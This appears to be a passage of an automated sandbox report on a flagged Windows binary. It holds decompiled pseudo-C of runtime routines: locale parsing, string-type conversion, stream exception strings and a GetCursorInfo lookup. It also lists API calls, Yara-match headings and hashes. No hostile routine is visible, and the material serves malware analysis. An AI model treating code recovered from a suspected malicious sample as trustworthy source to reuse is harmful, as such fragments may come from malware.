                                    							_t470 = _t471 + 0x18;
                                    							if(_v8 < 0x457384) {
                                    								goto L2;
                                    							} else {
                                    								if(_v12 != 0) {
                                    									E004401F5(_t357);
                                    									_t31 = _t443 + 0x28; // 0x30ff068b
                                    									_t434 = _t427 | 0xffffffff;
                                    									__eflags =  *_t31;
                                    									if(__eflags != 0) {
                                    										asm("lock xadd [ecx], eax");
                                    										if(__eflags == 0) {
                                    											_t32 = _t443 + 0x28; // 0x30ff068b
                                    											E004401F5( *_t32);
                                    										}
                                    									}
                                    									_t33 = _t443 + 0x24; // 0x30ff0c46
                                    									__eflags =  *_t33;
                                    									if( *_t33 != 0) {
                                    										asm("lock xadd [eax], edi");
                                    										__eflags = _t434 == 1;
                                    										if(_t434 == 1) {
                                    											_t34 = _t443 + 0x24; // 0x30ff0c46
                                    											E004401F5( *_t34);
                                    										}
                                    									}
                                    									 *(_t443 + 0x24) = 0;
                                    									 *(_t443 + 0x1c) = 0;
                                    									 *(_t443 + 0x28) = 0;
                                    									 *((intOrPtr*)(_t443 + 0x20)) = 0;
                                    									_t39 = _t443 + 0x40; // 0x10468b00
                                    									_t240 =  *_t39;
                                    								} else {
                                    									_t20 = _t443 + 0x28; // 0x30ff068b
                                    									_t437 = _t427 | 0xffffffff;
                                    									_t491 =  *_t20;
                                    									if(_t491 != 0) {
                                    										asm("lock xadd [ecx], eax");
                                    										if(_t491 == 0) {
                                    											_t21 = _t443 + 0x28; // 0x30ff068b
                                    											E004401F5( *_t21);
                                    										}
                                    									}
                                    									_t22 = _t443 + 0x24; // 0x30ff0c46
                                    									if( *_t22 != 0) {
                                    										asm("lock xadd [eax], edi");
                                    										if(_t437 == 1) {
                                    											_t23 = _t443 + 0x24; // 0x30ff0c46
                                    											E004401F5( *_t23);
                                    										}
                                    									}
                                    									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
                                    									_t26 = _t357 + 4; // 0x4
                                    									_t240 = _t26;
                                    									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
                                    									 *(_t443 + 0x28) = _t357;
                                    									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
                                    								}
                                    								goto L20;
                                    							}
                                    							goto L130;
                                    						}
                                    						asm("sbb eax, eax");
                                    						_t340 = _t339 | 0x00000001;
                                    						__eflags = _t340;
                                    						goto L10;
                                    					}
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					L0043698A(0);
                                    					asm("int3");
                                    					_push(_t461);
                                    					_t463 = _t471;
                                    					_t472 = _t471 - 0x1d0;
                                    					_t247 =  *0x46a00c; // 0xbd45ae92
                                    					_v56 = _t247 ^ _t463;
                                    					_t249 = _v40;
                                    					_push(_t357);
                                    					_push(_t443);
                                    					_t444 = _v36;
                                    					_push(_t427);
                                    					_t428 = _v44;
                                    					_v508 = _t428;
                                    					__eflags = _t249;
                                    					if(_t249 == 0) {
                                    						_v456 = 1;
                                    						_v468 = 0;
                                    						_t359 = 0;
                                    						_v452 = 0;
                                    						__eflags = _t444;
                                    						if(__eflags == 0) {
                                    							L79:
                                    							E0043E550(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
                                    							goto L80;
                                    						} else {
                                    							__eflags =  *_t444 - 0x4c;
                                    							if( *_t444 != 0x4c) {
                                    								L58:
                                    								_push(0);
                                    								_t255 = E0043E118(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
                                    								_t474 = _t472 + 0x18;
                                    								__eflags = _t255;
                                    								if(_t255 != 0) {
                                    									_t370 = 0;
                                    									__eflags = 0;
                                    									_t421 = _t428 + 0x20;
                                    									_t446 = 0;
                                    									_v452 = _t421;
                                    									do {
                                    										__eflags = _t446;
                                    										if(_t446 == 0) {
                                    											L73:
                                    											_t256 = _v456;
                                    										} else {
                                    											_t374 =  *_t421;
                                    											_t257 =  &_v276;
                                    											while(1) {
                                    												__eflags =  *_t257 -  *_t374;
                                    												_t428 = _v464;
                                    												if( *_t257 !=  *_t374) {
                                    													break;
                                    												}
                                    												__eflags =  *_t257;
                                    												if( *_t257 == 0) {
                                    													L66:
                                    													_t370 = 0;
                                    													_t258 = 0;
                                    												} else {
                                    													_t422 =  *((intOrPtr*)(_t257 + 2));
                                    													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
                                    													_v458 = _t422;
                                    													_t421 = _v452;
                                    													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
                                    														break;
                                    													} else {
                                    														_t257 = _t257 + 4;
                                    														_t374 = _t374 + 4;
                                    														__eflags = _v458;
                                    														if(_v458 != 0) {
                                    															continue;
                                    														} else {
                                    															goto L66;
                                    														}
                                    													}
                                    												}
                                    												L68:
                                    												__eflags = _t258;
                                    												if(_t258 == 0) {
                                    													_t359 = _t359 + 1;
                                    													__eflags = _t359;
                                    													goto L73;
                                    												} else {
                                    													_t259 =  &_v276;
                                    													_push(_t259);
                                    													_push(_t446);
                                    													_push(_t428);
                                    													L83();
                                    													_t421 = _v452;
                                    													_t474 = _t474 + 0xc;
                                    													__eflags = _t259;
                                    													if(_t259 == 0) {
                                    														_t370 = 0;
                                    														_t256 = 0;
                                    														_v456 = 0;
                                    													} else {
                                    														_t359 = _t359 + 1;
                                    														_t370 = 0;
                                    														goto L73;
                                    													}
                                    												}
                                    												goto L74;
                                    											}
                                    											asm("sbb eax, eax");
                                    											_t258 = _t257 | 0x00000001;
                                    											_t370 = 0;
                                    											__eflags = 0;
                                    											goto L68;
                                    										}
                                    										L74:
                                    										_t446 = _t446 + 1;
                                    										_t421 = _t421 + 0x10;
                                    										_v452 = _t421;
                                    										__eflags = _t446 - 5;
                                    									} while (_t446 <= 5);
                                    									__eflags = _t256;
                                    									if(__eflags != 0) {
                                    										goto L79;
                                    									} else {
                                    										__eflags = _t359;
                                    										goto L77;
                                    									}
                                    								}
                                    								goto L80;
                                    							} else {
                                    								__eflags =  *(_t444 + 2) - 0x43;
                                    								if( *(_t444 + 2) != 0x43) {
                                    									goto L58;
                                    								} else {
                                    									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
                                    									if( *((short*)(_t444 + 4)) != 0x5f) {
                                    										goto L58;
                                    									} else {
                                    										while(1) {
                                    											_t261 = E00449367(_t444, 0x457490);
                                    											_t361 = _t261;
                                    											_v472 = _t361;
                                    											_pop(_t376);
                                    											__eflags = _t361;
                                    											if(_t361 == 0) {
                                    												break;
                                    											}
                                    											_t263 = _t261 - _t444;
                                    											__eflags = _t263;
                                    											_v456 = _t263 >> 1;
                                    											if(_t263 == 0) {
                                    												break;
                                    											} else {
                                    												_t265 = 0x3b;
                                    												__eflags =  *_t361 - _t265;
                                    												if( *_t361 == _t265) {
                                    													break;
                                    												} else {
                                    													_t431 = _v456;
                                    													_t362 = 0x457354;
                                    													_v460 = 1;
                                    													do {
                                    														_t266 = E0044932D( *_t362, _t444, _t431);
                                    														_t472 = _t472 + 0xc;
                                    														__eflags = _t266;
                                    														if(_t266 != 0) {
                                    															goto L45;
                                    														} else {
                                    															_t377 =  *_t362;
                                    															_t420 = _t377 + 2;
                                    															do {
                                    																_t334 =  *_t377;
                                    																_t377 = _t377 + 2;
                                    																__eflags = _t334 - _v468;
                                    															} while (_t334 != _v468);
                                    															_t376 = _t377 - _t420 >> 1;
                                    															__eflags = _t431 - _t377 - _t420 >> 1;
                                    															if(_t431 != _t377 - _t420 >> 1) {
                                    																goto L45;
                                    															}
                                    														}
                                    														break;
                                    														L45:
                                    														_v460 = _v460 + 1;
                                    														_t362 = _t362 + 0xc;
                                    														__eflags = _t362 - 0x457384;
                                    													} while (_t362 <= 0x457384);
                                    													_t359 = _v472 + 2;
                                    													_t267 = E004492DD(_t376, _t359, ";");
                                    													_t428 = _v464;
                                    													_t447 = _t267;
                                    													_pop(_t380);
                                    													__eflags = _t447;
                                    													if(_t447 != 0) {
                                    														L48:
                                    														__eflags = _v460 - 5;
                                    														if(_v460 > 5) {
                                    															_t268 = _v452;
                                    															goto L54;
                                    														} else {
                                    															_push(_t447);
                                    															_t270 = E00448349(_t380,  &_v276, 0x83, _t359);
                                    															_t475 = _t472 + 0x10;
                                    															__eflags = _t270;
                                    															if(_t270 != 0) {
                                    																L82:
                                    																_push(0);
                                    																_push(0);
                                    																_push(0);
                                    																_push(0);
                                    																_push(0);
                                    																L0043698A(0);
                                    																asm("int3");
                                    																_push(_t463);
                                    																_t465 = _t475;
                                    																_v556 =  *0x46a00c ^ _t465;
                                    																_push(_t359);
                                    																_t364 = _v540;
                                    																_push(_t447);
                                    																_push(_t428);
                                    																_t432 = _v544;
                                    																_v1292 = _t364;
                                    																_v1276 = L00441CE2(_t364, _t380, _t420) + 0x278;
                                    																_push( &_v1256);
                                    																_t280 = E0043E118(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
                                    																_t477 = _t475 - 0x2e4 + 0x18;
                                    																__eflags = _t280;
                                    																if(_t280 != 0) {
                                    																	_t450 = _t364 + 2 << 4;
                                    																	__eflags = _t450;
                                    																	_t281 =  &_v280;
                                    																	_v724 = _t450;
                                    																	_t381 =  *((intOrPtr*)(_t450 + _t432));
                                    																	while(1) {
                                    																		_v712 = _v712 & 0x00000000;
                                    																		__eflags =  *_t281 -  *_t381;
                                    																		_t452 = _v724;
                                    																		if( *_t281 !=  *_t381) {
                                    																			break;
                                    																		}
                                    																		__eflags =  *_t281;
                                    																		if( *_t281 == 0) {
                                    																			L91:
                                    																			_t282 = _v712;
                                    																		} else {
                                    																			_t459 =  *((intOrPtr*)(_t281 + 2));
                                    																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
                                    																			_v718 = _t459;
                                    																			_t452 = _v724;
                                    																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
                                    																				break;
                                    																			} else {
                                    																				_t281 = _t281 + 4;
                                    																				_t381 = _t381 + 4;
                                    																				__eflags = _v718;
                                    																				if(_v718 != 0) {
                                    																					continue;
                                    																				} else {
                                    																					goto L91;
                                    																				}
                                    																			}
                                    																		}
                                    																		L93:
                                    																		__eflags = _t282;
                                    																		if(_t282 != 0) {
                                    																			_t382 =  &_v280;
                                    																			_t424 = _t382 + 2;
                                    																			do {
                                    																				_t283 =  *_t382;
                                    																				_t382 = _t382 + 2;
                                    																				__eflags = _t283 - _v712;
                                    																			} while (_t283 != _v712);
                                    																			_v728 = (_t382 - _t424 >> 1) + 1;
                                    																			_t286 = E0043F98C(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
                                    																			_v740 = _t286;
                                    																			__eflags = _t286;
                                    																			if(_t286 == 0) {
                                    																				goto L84;
                                    																			} else {
                                    																				_v732 =  *((intOrPtr*)(_t452 + _t432));
                                    																				_v744 =  *(_t432 + 0xa0 + _t364 * 4);
                                    																				_v748 =  *(_t432 + 8);
                                    																				_t391 =  &_v280;
                                    																				_v720 = _t286 + 4;
                                    																				_t290 = L004415D4(_t286 + 4, _v728,  &_v280);
                                    																				_t479 = _t477 + 0xc;
                                    																				__eflags = _t290;
                                    																				if(_t290 != 0) {
                                    																					_t291 = _v712;
                                    																					_push(_t291);
                                    																					_push(_t291);
                                    																					_push(_t291);
                                    																					_push(_t291);
                                    																					_push(_t291);
                                    																					L0043698A(_t291);
                                    																					asm("int3");
                                    																					return  *0x46b508;
                                    																				} else {
                                    																					__eflags = _v280 - 0x43;
                                    																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
                                    																					if(_v280 != 0x43) {
                                    																						L102:
                                    																						_t296 = L0043DE25(_t364, _t391, _t432,  &_v708);
                                    																						_t393 = _v712;
                                    																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
                                    																					} else {
                                    																						__eflags = _v278;
                                    																						if(_v278 != 0) {
                                    																							goto L102;
                                    																						} else {
                                    																							_t393 = _v712;
                                    																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
                                    																						}
                                    																					}
                                    																					__eflags = _t364 - 2;
                                    																					if(_t364 != 2) {
                                    																						__eflags = _t364 - 1;
                                    																						if(_t364 != 1) {
                                    																							__eflags = _t364 - 5;
                                    																							if(_t364 == 5) {
                                    																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
                                    																							}
                                    																						} else {
                                    																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
                                    																						}
                                    																					} else {
                                    																						_t457 = _v736;
                                    																						_t425 = _t393;
                                    																						_t403 = _t457;
                                    																						 *(_t432 + 8) = _v716;
                                    																						_v720 = _t457;
                                    																						_v728 = _t457[8];
                                    																						_v716 = _t457[9];
                                    																						while(1) {
                                    																							__eflags =  *(_t432 + 8) -  *_t403;
                                    																							if( *(_t432 + 8) ==  *_t403) {
                                    																								break;
                                    																							}
                                    																							_t458 = _v720;
                                    																							_t425 = _t425 + 1;
                                    																							_t328 =  *_t403;
                                    																							 *_t458 = _v728;
                                    																							_v716 = _t403[1];
                                    																							_t403 = _t458 + 8;
                                    																							 *((intOrPtr*)(_t458 + 4)) = _v716;
                                    																							_t364 = _v752;
                                    																							_t457 = _v736;
                                    																							_v728 = _t328;
                                    																							_v720 = _t403;
                                    																							__eflags = _t425 - 5;
                                    																							if(_t425 < 5) {
                                    																								continue;
                                    																							} else {
                                    																							}
                                    																							L110:
                                    																							__eflags = _t425 - 5;
                                    																							if(__eflags == 0) {
                                    																								_t319 = E004493AC(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x457410, 0x7f,  &_v536,  *(_t432 + 8), 1);
                                    																								_t479 = _t479 + 0x1c;
                                    																								__eflags = _t319;
                                    																								_t320 = _v712;
                                    																								if(_t319 == 0) {
                                    																									_t457[1] = _t320;
                                    																								} else {
                                    																									do {
                                    																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
                                    																										_t320 = _t320 + 1;
                                    																										__eflags = _t320 - 0x7f;
                                    																									} while (_t320 < 0x7f);
                                    																									_t323 = L004337C1( &_v536,  *0x46a170, 0xfe);
                                    																									_t479 = _t479 + 0xc;
                                    																									__eflags = _t323;
                                    																									_t457[1] = 0 | _t323 == 0x00000000;
                                    																								}
                                    																								 *_t457 =  *(_t432 + 8);
                                    																							}
                                    																							 *(_t432 + 0x18) = _t457[1];
                                    																							goto L121;
                                    																						}
                                    																						__eflags = _t425;
                                    																						if(_t425 != 0) {
                                    																							 *_t457 =  *(_t457 + _t425 * 8);
                                    																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
                                    																							 *(_t457 + _t425 * 8) = _v728;
                                    																							 *(_t457 + 4 + _t425 * 8) = _v716;
                                    																						}
                                    																						goto L110;
                                    																					}
                                    																					L121:
                                    																					 *0x453474(_t432);
                                    																					_t299 =  *((intOrPtr*)( *((intOrPtr*)(0x457350 + _t364 * 0xc))))();
                                    																					_t396 = _v732;
                                    																					__eflags = _t299;
                                    																					if(_t299 == 0) {
                                    																						__eflags = _t396 - 0x46a2a8;
                                    																						if(_t396 != 0x46a2a8) {
                                    																							_t456 = _t364 + _t364;
                                    																							__eflags = _t456;
                                    																							asm("lock xadd [eax], ecx");
                                    																							if(_t456 != 0) {
                                    																								goto L126;
                                    																							} else {
                                    																								E004401F5( *((intOrPtr*)(_t432 + 0x28 + _t456 * 8)));
                                    																								E004401F5( *((intOrPtr*)(_t432 + 0x24 + _t456 * 8)));
                                    																								E004401F5( *(_t432 + 0xa0 + _t364 * 4));
                                    																								_t399 = _v712;
                                    																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
                                    																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
                                    																							}
                                    																						}
                                    																						_t397 = _v740;
                                    																						 *_t397 = 1;
                                    																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
                                    																					} else {
                                    																						 *(_v724 + _t432) = _t396;
                                    																						E004401F5( *(_t432 + 0xa0 + _t364 * 4));
                                    																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
                                    																						E004401F5(_v740);
                                    																						 *(_t432 + 8) = _v748;
                                    																						goto L84;
                                    																					}
                                    																					goto L85;
                                    																				}
                                    																			}
                                    																		} else {
                                    																			goto L85;
                                    																		}
                                    																		goto L130;
                                    																	}
                                    																	asm("sbb eax, eax");
                                    																	_t282 = _t281 | 0x00000001;
                                    																	__eflags = _t282;
                                    																	goto L93;
                                    																} else {
                                    																	L84:
                                    																	__eflags = 0;
                                    																	L85:
                                    																	__eflags = _v16 ^ _t465;
                                    																	return L0042FD1B(_v16 ^ _t465);
                                    																}
                                    															} else {
                                    																_t330 = _t447 + _t447;
                                    																__eflags = _t330 - 0x106;
                                    																if(_t330 >= 0x106) {
                                    																	L0042FE4F();
                                    																	goto L82;
                                    																} else {
                                    																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
                                    																	_t332 =  &_v276;
                                    																	_push(_t332);
                                    																	_push(_v460);
                                    																	_push(_t428);
                                    																	L83();
                                    																	_t472 = _t475 + 0xc;
                                    																	__eflags = _t332;
                                    																	_t268 = _v452;
                                    																	if(_t332 != 0) {
                                    																		_t268 = _t268 + 1;
                                    																		_v452 = _t268;
                                    																	}
                                    																	L54:
                                    																	_t444 = _t359 + _t447 * 2;
                                    																	_t370 = 0;
                                    																	__eflags =  *_t444;
                                    																	if( *_t444 == 0) {
                                    																		L56:
                                    																		__eflags = _t268;
                                    																		L77:
                                    																		if(__eflags != 0) {
                                    																			goto L79;
                                    																		} else {
                                    																		}
                                    																		goto L80;
                                    																	} else {
                                    																		_t444 = _t444 + 2;
                                    																		__eflags =  *_t444;
                                    																		if( *_t444 != 0) {
                                    																			continue;
                                    																		} else {
                                    																			goto L56;
                                    																		}
                                    																	}
                                    																}
                                    															}
                                    														}
                                    													} else {
                                    														_t333 = 0x3b;
                                    														__eflags =  *_t359 - _t333;
                                    														if( *_t359 != _t333) {
                                    															break;
                                    														} else {
                                    															goto L48;
                                    														}
                                    													}
                                    												}
                                    											}
                                    											goto L130;
                                    										}
                                    										goto L80;
                                    									}
                                    								}
                                    							}
                                    						}
                                    					} else {
                                    						__eflags = _t444;
                                    						if(_t444 != 0) {
                                    							_push(_t444);
                                    							_push(_t249);
                                    							_push(_t428);
                                    							L83();
                                    						}
                                    						L80:
                                    						__eflags = _v12 ^ _t463;
                                    						return L0042FD1B(_v12 ^ _t463);
                                    					}
                                    				}
                                    				L130:
                                    			}
                                    0x0043ebb0
                                    0x0043ebb3
                                    0x0043ebb5
                                    0x00000000
                                    0x00000000
                                    0x0043ebb7
                                    0x0043ebbd
                                    0x0043ebbe
                                    0x0043ebc9
                                    0x0043ebd1
                                    0x0043ebd9
                                    0x0043ebdc
                                    0x0043ebdf
                                    0x0043ebe5
                                    0x0043ebeb
                                    0x0043ebf1
                                    0x0043ebf7
                                    0x0043ebfa
                                    0x00000000
                                    0x00000000
                                    0x0043ebfc
                                    0x0043ec21
                                    0x0043ec21
                                    0x0043ec24
                                    0x0043ec41
                                    0x0043ec46
                                    0x0043ec49
                                    0x0043ec4b
                                    0x0043ec51
                                    0x0043ec8c
                                    0x0043ec53
                                    0x0043ec53
                                    0x0043ec58
                                    0x0043ec60
                                    0x0043ec61
                                    0x0043ec61
                                    0x0043ec78
                                    0x0043ec7f
                                    0x0043ec82
                                    0x0043ec87
                                    0x0043ec87
                                    0x0043ec92
                                    0x0043ec92
                                    0x0043ec97
                                    0x00000000
                                    0x0043ec97
                                    0x0043ebfe
                                    0x0043ec00
                                    0x0043ec05
                                    0x0043ec0b
                                    0x0043ec14
                                    0x0043ec1d
                                    0x0043ec1d
                                    0x00000000
                                    0x0043ec00
                                    0x0043ecba
                                    0x0043ecc6
                                    0x0043eccc
                                    0x0043eccf
                                    0x0043ecd5
                                    0x0043ecd7
                                    0x0043ed17
                                    0x0043ed1d
                                    0x0043ed24
                                    0x0043ed24
                                    0x0043ed2a
                                    0x0043ed2e
                                    0x00000000
                                    0x0043ed30
                                    0x0043ed34
                                    0x0043ed3d
                                    0x0043ed49
                                    0x0043ed57
                                    0x0043ed5d
                                    0x0043ed60
                                    0x0043ed60
                                    0x0043ed2e
                                    0x0043ed6f
                                    0x0043ed77
                                    0x0043ed80
                                    0x0043ecd9
                                    0x0043ecdf
                                    0x0043ece9
                                    0x0043ecfb
                                    0x0043ed02
                                    0x0043ed0f
                                    0x00000000
                                    0x0043ed0f
                                    0x00000000
                                    0x0043ecd7
                                    0x0043eb30
                                    0x0043eaab
                                    0x00000000
                                    0x0043eaab
                                    0x00000000
                                    0x0043eaa9
                                    0x0043eaa2
                                    0x0043eaa4
                                    0x0043eaa4
                                    0x00000000
                                    0x0043ea2e
                                    0x0043ea2e
                                    0x0043ea2e
                                    0x0043ea30
                                    0x0043ea35
                                    0x0043ea40
                                    0x0043ea40
                                    0x0043e857
                                    0x0043e857
                                    0x0043e85a
                                    0x0043e85f
                                    0x0043e9bc
                                    0x00000000
                                    0x0043e865
                                    0x0043e867
                                    0x0043e86f
                                    0x0043e875
                                    0x0043e876
                                    0x0043e87c
                                    0x0043e87d
                                    0x0043e882
                                    0x0043e885
                                    0x0043e887
                                    0x0043e88d
                                    0x0043e88f
                                    0x0043e890
                                    0x0043e890
                                    0x0043e89e
                                    0x0043e89e
                                    0x0043e8a1
                                    0x0043e8a3
                                    0x0043e8a6
                                    0x0043e8b4
                                    0x0043e8b4
                                    0x0043e99e
                                    0x0043e99e
                                    0x00000000
                                    0x0043e9a0
                                    0x0043e9a0
                                    0x00000000
                                    0x0043e8a8
                                    0x0043e8a8
                                    0x0043e8ab
                                    0x0043e8ae
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0043e8ae
                                    0x0043e8a6
                                    0x0043e85f
                                    0x0043e851
                                    0x0043e824
                                    0x0043e826
                                    0x0043e827
                                    0x0043e82a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0043e82a
                                    0x0043e822
                                    0x0043e7aa
                                    0x00000000
                                    0x0043e79e
                                    0x00000000
                                    0x0043e8bb
                                    0x0043e771
                                    0x0043e766
                                    0x0043e75b
                                    0x0043e714
                                    0x0043e714
                                    0x0043e716
                                    0x0043e718
                                    0x0043e719
                                    0x0043e71a
                                    0x0043e71b
                                    0x0043e720
                                    0x0043e9ab
                                    0x0043e9b0
                                    0x0043e9bb
                                    0x0043e9bb
                                    0x0043e712
                                    0x00000000

                                    APIs
                                      • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                    • _free.LIBCMT ref: 0043E65B
                                    • _free.LIBCMT ref: 0043E672
                                    • _free.LIBCMT ref: 0043E691
                                    • _free.LIBCMT ref: 0043E6AC
                                    • _free.LIBCMT ref: 0043E6C3
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _free$AllocateHeap
                                    • String ID:
                                    • API String ID: 3033488037-0
                                    • Opcode ID: 0e44e192ae9f7449bc2dcdd52dfacc8fa8f025cb327802adf5d2bcb5333049c9
                                    • Instruction ID: 9ca46151fc1eb59705b8745a81b868f81510b806d69f04cfdfe39fc5a4c1e60e
                                    • Opcode Fuzzy Hash: 0e44e192ae9f7449bc2dcdd52dfacc8fa8f025cb327802adf5d2bcb5333049c9
                                    • Instruction Fuzzy Hash: 2C51E371A02304AFDB20DF2BC842B6A77F4EF5C724F54156EE909D7290E739D9018B88
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 81%
                                    			E004493AC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                    				signed int _v8;
                                    				int _v12;
                                    				char _v16;
                                    				intOrPtr _v24;
                                    				char _v28;
                                    				void* _v40;
                                    				signed int _t34;
                                    				signed int _t40;
                                    				int _t46;
                                    				int _t53;
                                    				void* _t55;
                                    				int _t57;
                                    				signed int _t63;
                                    				int _t67;
                                    				short* _t69;
                                    				signed int _t70;
                                    				short* _t71;
                                    
                                    				_t34 =  *0x46a00c; // 0xbd45ae92
                                    				_v8 = _t34 ^ _t70;
                                    				L00435507(__ebx,  &_v28, __edx, _a4);
                                    				_t57 = _a24;
                                    				if(_t57 == 0) {
                                    					_t53 =  *(_v24 + 8);
                                    					_t57 = _t53;
                                    					_a24 = _t53;
                                    				}
                                    				_t67 = 0;
                                    				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                    				_v12 = _t40;
                                    				if(_t40 == 0) {
                                    					L15:
                                    					if(_v16 != 0) {
                                    						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                    					}
                                    					return L0042FD1B(_v8 ^ _t70);
                                    				}
                                    				_t55 = _t40 + _t40;
                                    				asm("sbb eax, eax");
                                    				if((_t55 + 0x00000008 & _t40) == 0) {
                                    					_t69 = 0;
                                    					L11:
                                    					if(_t69 != 0) {
                                    						L00431F00(_t67, _t69, _t67, _t55);
                                    						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                                    						if(_t46 != 0) {
                                    							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                                    						}
                                    					}
                                    					L14:
                                    					L00430BA0(_t69);
                                    					goto L15;
                                    				}
                                    				asm("sbb eax, eax");
                                    				_t48 = _t40 & _t55 + 0x00000008;
                                    				_t63 = _t55 + 8;
                                    				if((_t40 & _t55 + 0x00000008) > 0x400) {
                                    					asm("sbb eax, eax");
                                    					_t69 = E0043F98C(_t63, _t48 & _t63);
                                    					if(_t69 == 0) {
                                    						goto L14;
                                    					}
                                    					 *_t69 = 0xdddd;
                                    					L9:
                                    					_t69 =  &(_t69[4]);
                                    					goto L11;
                                    				}
                                    				asm("sbb eax, eax");
                                    				L00450810();
                                    				_t69 = _t71;
                                    				if(_t69 == 0) {
                                    					goto L14;
                                    				}
                                    				 *_t69 = 0xcccc;
                                    				goto L9;
                                    			}

                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00428E1A,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A), ref: 004493F9
                                    • __alloca_probe_16.LIBCMT ref: 00449431
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00428E1A,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A,?), ref: 00449482
                                    • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A,?,00000002,?), ref: 00449494
                                    • __freea.LIBCMT ref: 0044949D
                                      • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                    • String ID:
                                    • API String ID: 313313983-0
                                    • Opcode ID: cce82c534eee8c0eed9136d7476892f93b41b1e858a0b671dc24d243c078f96e
                                    • Instruction ID: e49a694d908820c5dcacf8e8a5bbec85b76551c47cbf7292b4779bafd8218c50
                                    • Opcode Fuzzy Hash: cce82c534eee8c0eed9136d7476892f93b41b1e858a0b671dc24d243c078f96e
                                    • Instruction Fuzzy Hash: 1231ED72A0020AABEF249F65DC41DAF7BA5EF00714F04412AFC08D7291E739DD52DBA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C119
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Exception@8Throw
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 2005118841-1866435925
                                    • Opcode ID: 92f0f012ab8be239e50056247fdc818a5de3ea501611d2d121b0742182c93af8
                                    • Instruction ID: fbfdbc6450803e664eb4f4f41a0da8e4bd286e2513790d23a86e9e7a09bff230
                                    • Opcode Fuzzy Hash: 92f0f012ab8be239e50056247fdc818a5de3ea501611d2d121b0742182c93af8
                                    • Instruction Fuzzy Hash: 5C01A770644208EAD714E791CC93FBB73549B10744F60853BBE01791C3EA7C5542CA5F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004013AD() {
                                    				_Unknown_base(*)()* _t2;
                                    
                                    				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
                                    				 *0x46c5e4 = _t2;
                                    				return _t2;
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013B7
                                    • GetProcAddress.KERNEL32(00000000), ref: 004013BE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
